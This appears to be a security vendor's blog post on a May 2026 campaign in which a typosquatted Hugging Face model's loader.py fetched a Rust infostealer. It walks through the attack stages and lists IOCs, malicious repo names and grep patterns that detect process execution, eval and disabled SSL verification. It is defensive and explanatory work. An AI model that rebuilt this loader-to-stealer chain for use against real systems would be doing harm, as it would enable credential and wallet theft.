In early May 2026, a malicious repository named Open-OSS/privacy-filter appeared on Hugging Face. It impersonated OpenAI's legitimate org and copied the official model card verbatim. Within 18 hours it was the #1 trending model on the platform with roughly 244,000 downloads. Behind the scenes, a loader.py was downloading a Rust-based information stealer onto every Windows machine that ran it.
The attack was discovered by HiddenLayer Research, which linked it to the WinOS 4.0 implant via prior Panther research on a parallel npm typosquat. Subsequent coverage from The Hacker News attributed the activity to Silver Fox, a Chinese threat actor associated with the ValleyRAT malware family. This guide covers what happened, how the multi-stage payload worked, and the seven verification steps every AI developer should run before calling from_pretrained on anything new.
Information current as of May 11, 2026. HiddenLayer Research, npm and Hugging Face security teams, and downstream reporters are still investigating. This post will be updated periodically as new IOCs, technical analysis, or attribution evidence is published.
What Happened
OpenAI published a small open-source utility model called openai/privacy-filter in April 2026. It is the kind of release that gets a few thousand downloads from researchers and red-teamers and then quietly accumulates a slow tail of traffic. Attackers noticed the same thing the rest of us did, which is that anything with “OpenAI” in the name pulls disproportionate attention on Hugging Face.
A few weeks later they uploaded Open-OSS/privacy-filter from a brand-new account. The repo cloned OpenAI's model card verbatim. The only differences were a fake loader.py and a configuration that called it on load. According to BleepingComputer's coverage of the HiddenLayer findings, the model reached the top of Hugging Face's trending list inside 18 hours with around 244,000 downloads and 667 likes. Both numbers were likely inflated by bots, but the trending placement made the repo visible to legitimate developers searching for the real release.
The campaign was not a single repo. HiddenLayer documented a cluster of six sibling uploads from an account named anthfu (all uploaded April 24, 2026) that targeted other high-attention namespaces: Bonsai-8B-gguf, DeepSeek-V4-Pro, Qwopus-GLM-18B-Merged-GGUF, and others. All used the same loader pattern. A related npm package called trevlo, first flagged by Panther in April 2026, delivered the same WinOS 4.0 implant through the operator's parallel npm infrastructure.
Hugging Face disabled the repos shortly after disclosure. The npm package is gone. But for every researcher and developer who loaded the fake model during the 18-hour window, the stealer ran with their user privileges and shipped browser sessions, Discord tokens, wallet seed phrases, and FileZilla credentials out the door before anyone knew anything was wrong.
Incident Timeline
Apr 2026
OpenAI publishes the legitimate openai/privacy-filter model on Hugging Face
Early May 2026
Attackers create Open-OSS/privacy-filter, copying OpenAI's model card verbatim
~18 hours later
The fake repo hits #1 trending on Hugging Face with ~244,000 downloads and 667 likes
May 7, 2026
HiddenLayer Research identifies the malicious loader.py and infostealer payload
Shortly after disclosure
Hugging Face disables Open-OSS/privacy-filter and the related anthfu/* sibling repos
Anatomy of the Attack
The fake model worked because Hugging Face is, by design, a code-distribution platform that happens to host tensors. Any repo can ship a loader.py that runs when you call from_pretrained. The five-stage chain that follows is reconstructed from HiddenLayer's technical writeup, and it is the same shape as a typical npm post-install attack, just adapted to the ML toolchain.
Stage 1: loader.py bait
Shipped inside the model repo. When a user calls from_pretrained on the fake model, loader.py executes and disables SSL verification before fetching the next stage.
Stage 2: Dead-drop resolver
The loader queries JSON Keeper as a resolver to fetch the live payload URL, letting the operators swap delivery infrastructure without redeploying the model.
Stage 3: PowerShell + batch
A PowerShell command pulls a batch script from api.eth-fastscan[.]org. The script prompts UAC and adds Microsoft Defender exclusions to its working directory.
Stage 4: Rust infostealer
A 1.07 MB Rust-based stealer (SHA-256 ba67720d...) harvests Chromium and Gecko browser data, Discord local storage, FileZilla configs, crypto wallets, seed phrases, and screenshots.
Stage 5: Exfiltration
Harvested data is serialized to JSON and exfiltrated to recargapopular[.]com. Telemetry beacons go to welovechinatown[.]info as the C2.
Why the multi-stage design matters
The loader inside the repo is small, boring, and easy to miss in code review. The interesting payload lives at api.eth-fastscan[.]org, behind a JSON Keeper redirect that the operators can swap at will. Even if Hugging Face had scanned the static repo contents, the malicious bits were never in the artefact. They were one HTTP request away.
Why the AI Model Supply Chain Is Different from npm
If you have read our coverage of the Axios npm supply chain attack or the Claude Code source map leak, the loader.py pattern looks familiar. It is essentially the npm post-install hook reinvented for the ML world. What makes the AI model supply chain a richer target is not the technique. It is the missing scaffolding.
npm has lockfiles, signed registry tarballs, npm audit, Socket.dev, Snyk, and a decade of muscle memory around .npmrc hardening. Hugging Face has tags, model cards, and a community trust signal in the form of likes and downloads. There is no widely adopted lockfile equivalent for model weights. There is no industry-standard signing mechanism for tensor files. The cultural default is trust_remote_code=True because some legitimate models genuinely need it.
That gap is where Silver Fox lived. Trending placement substituted for reputation. A copy-pasted model card substituted for code review. The 244,000 download number, inflated or not, substituted for a signed manifest. None of this is Hugging Face's fault any more than the Axios incident was npm's fault. It is the ecosystem maturing under attack.
How to Verify AI Models Before You Load Them
None of the following checks is sufficient on its own. Layered together, every one of them would have caught the fake privacy filter inside 60 seconds. If you maintain an MLOps pipeline that pulls models from Hugging Face, codify these as CI steps instead of relying on the person running from_pretrained to remember them.
1Verify the org name against the vendor's official channel
The single most effective check. Open the vendor's official site (openai.com, ai.meta.com, mistral.ai) and copy the org slug from there. Do not trust a Hugging Face search result, do not trust the first Google hit, and do not trust a tweet. Typosquats like Open-OSS vs openai look obvious in hindsight and invisible when you are in flow.
# Always confirm the publisher org against the vendor's official channel.# OpenAI's real repo is openai/. Look-alikes use Open-OSS/, openai-team/, etc.# Wrong: Open-OSS/privacy-filter <- typosquat# Right: openai/privacy-filter <- the real one# Anchor on the announcement URL, not on a Hugging Face search result.# https://openai.com/index/<announcement-slug># https://github.com/openai/<repo>
2Check the upload date against the announcement
Real vendor releases ship on the same day as the announcement, not weeks later. A model card that quotes a blog post from a month ago but was uploaded yesterday is a red flag. Sort the org's repos by date and confirm the new release is not a recent solo upload from a fresh account.
3Audit any custom loader, config, or modeling file
Tensor files are inert. Python files are not. Open every loader.py, modeling_*.py, and configuration_*.py in the repo before you load anything. Five greps cover most of what an attacker would do.
# Before loading, eyeball every Python file shipped with the repo.# These are the red-flag patterns.# 1. Outbound network calls during loadgrep -RInE "requests\.(get|post)|urllib\.|httpx\.|aiohttp\." .# 2. Process executiongrep -RInE "subprocess|os\.system|os\.popen|pty\.spawn" .# 3. Dynamic code executiongrep -RInE "exec\(|eval\(|compile\(" .# 4. SSL verification disabled (the fake privacy filter did this)grep -RInE "verify=False|InsecureRequestWarning" .# 5. Pickle deserialization on attacker-controlled bytesgrep -RInE "pickle\.loads?|torch\.load.*weights_only=False" .
4Default trust_remote_code to False
This flag is the single biggest force multiplier on a Hugging Face supply chain attack. With it set to True, calling from_pretrained on a malicious repo runs arbitrary code with your user permissions. Treat it the way you treat eval: never on by default, never on without a code review, never on without isolation. The official Hugging Face docs on custom models explain why the flag exists (loading architectures not built into transformers) and recommend pinning a revision whenever you do enable it.
5Pin a commit SHA with revision=
Branch names like main move. The bytes you reviewed today are not guaranteed to be the bytes you load next week. Pin the exact SHA you audited via the revision parameter. This is the Hugging Face equivalent of a lockfile entry.
from transformers import AutoModel, AutoTokenizer# DANGEROUS: loads HEAD of main, can change underneath youmodel = AutoModel.from_pretrained("vendor/model-name",trust_remote_code=False, # default this to False)# SAFER: pin a specific commit SHA you auditedmodel = AutoModel.from_pretrained("vendor/model-name",revision="3f9c2a1b4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f90", # the SHA you reviewedtrust_remote_code=False,)
6Run the first load inside a network-isolated sandbox
Even after the static review, run the first from_pretrained inside a container with --network none. If the loader tries to call out, you see the error instead of a stealer. If the load succeeds without complaint, the repo is at least not phoning home on import.
# Load once in an isolated container with no outbound network.# If anything tries to phone home, you'll see it (and survive it).docker run --rm -it \--network none \--read-only \--tmpfs /tmp:rw,size=2g \-v "$PWD/audit:/audit:ro" \python:3.12-slim \bash -c "pip install --no-deps transformers torch && \python -c 'from transformers import AutoModel; \AutoModel.from_pretrained(\"/audit/model\", \trust_remote_code=False)'"
7Subscribe to advisories that actually cover the AI stack
The traditional npm advisory feeds do not catch Hugging Face campaigns. Follow HiddenLayer Research, Socket.dev, and Hugging Face's own security disclosures. Set a 30-minute weekly slot to skim these in the same way ops teams skim CVE feeds. The fake privacy filter was disclosed publicly more than 24 hours before most teams found out internally.
The core principle: treat models as code
A Hugging Face repo is not a tensor file you download. It is a Python package that happens to ship weights. The same hygiene you apply to npm install on an unfamiliar package, you owe to from_pretrained on an unfamiliar model.
Attribution: Silver Fox and ValleyRAT
HiddenLayer's research connects the fake-model campaign to the WinOS 4.0 implant (also tracked as ValleyRAT) by linking its C2 domain welovechinatown[.]info to a parallel npm typosquat campaign documented by Panther in April 2026. Subsequent reporting from The Hacker News attributed the broader activity to Silver Fox, a Chinese-language threat actor best known for distributing WinOS 4.0 through phishing lures and trojanised installers aimed at Mandarin-speaking users.
Two things make this campaign notable as an evolution of the actor's tradecraft. First, the targeting shifted from regional phishing to the global developer audience that browses Hugging Face. Second, the operators ran a parallel npm push: a package called trevlo that delivered the same implant. Panther observed 866 downloads in their April 6 snapshot; CSO Online later reported the count had grown to roughly 2,300. HiddenLayer connects the two campaigns through the shared C2 domain welovechinatown[.]info.
The pattern matters because it confirms what defenders have suspected for a year: AI model registries and language package registries are now part of the same threat surface. The same operators are running both plays. The same defensive muscle you have built for one ecosystem applies to the other.
Indicators of Compromise
Source: HiddenLayer Research. Add these to your DNS sinkhole, EDR allowlists, and pip/Hugging Face audit rules.
Malicious repos (now disabled)
- Open-OSS/privacy-filter
- anthfu/Bonsai-8B-gguf
- anthfu/Qwen3.6-35B-A3B-APEX-GGUF
- anthfu/DeepSeek-V4-Pro
- anthfu/Qwopus-GLM-18B-Merged-GGUF
- anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
- anthfu/supergemma4-26b-uncensored-gguf-v2
- npm: trevlo
Network IOCs
- api.eth-fastscan[.]org
- welovechinatown[.]info
- recargapopular[.]com
- jsonkeeper[.]com/b/AVNNE
SHA-256 file hashes
loader.py (Open-OSS/privacy-filter)
6db01158b044f178c45754666e2cbc0365f394e953fbf99ec34aa5304d5b79b1
loader.py (anthfu/* repos)
6d5b1b7b9b95f2074094632e3962dc21432c2b7dccfbbe2c7d61f724ffcfea7c
start.bat
4fba92a34fd9338293de53444bc9f05c278897d903a24efb95fde0522b3d50c0
update.bat (downloader)
04f0569971ac7ff81c8656e8453a69189d8870040044909dad45c04c567e7564
Rust infostealer (1.07 MB)
ba67720dd115293ec5a12d08be6b0ee982227a4c5e4662fb89269c76556df6e0
Payload hosted by api.eth-fastscan[.]org
c1b59cc25bdc1fe3f3ce8eda06d002dda7cb02dea8c29877b68d04cd089363c7
Frequently Asked Questions
Related Resources
The Claude Code Source Map Leak
512K lines of TypeScript shipped via npm, and the four-layer build config that would have prevented it.
The Axios npm Supply Chain Attack
100M weekly downloads compromised overnight. The .npmrc config and lockfile discipline that protect you.
Cursor vs Claude Code vs OpenCode
A backend engineer compares all three AI coding tools daily. Pricing, workflows, and when to use which.
Best Claude Code Plugins, Skills & MCP Servers
The 7 tools that power agentic development workflows, with a security lens on what they can access.
Build Secure AI-Powered Workflows
TurboDocx helps engineering teams ship document automation with audited, enterprise-grade infrastructure. API-first, built by developers who treat every integration as untrusted by default.
